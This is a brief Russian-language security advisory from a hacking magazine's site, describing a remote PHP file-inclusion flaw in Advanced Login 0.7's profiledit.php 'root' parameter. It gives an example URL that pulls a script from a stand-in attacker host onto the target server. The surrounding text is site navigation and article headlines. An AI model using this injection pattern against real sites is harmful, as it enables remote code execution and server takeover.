PHP-инклюдинг в Advanced Login

Рекомендуем почитать:

Хакер #309. Самооборона по-хакерски

Содержание выпуска
Подписка на «Хакер»-60%

Программа: Advanced Login 0.7

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «root» сценарием profiledit.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://target.com/login/engine/db/profiledit.php?root==http://attact.com/colok.txt?

PHP-инклюдинг в Advanced Login

Хакер #309. Самооборона по-хакерски

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Генеративная клубничка. Как создаются модели для рисования откровенных сцен

Не тварь. Вспоминаем историю Novell NetWare

HTB Certified. Компрометируем домен через технику ESC9 ADCS

Хакеры.RU. Глава 0х13. Человеческий фактор

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

Новую ИИ-модель Google используют для удаления водяных знаков с изображений

В 2024 году в экосистеме WordPress обнаружили 8000 уязвимостей

Исследователи изучили криптор-сервис Crypters And Tools

В Steam нашли еще одну вредоносную игру

331 приложение из Google Play использовалось для фишинга и показа рекламы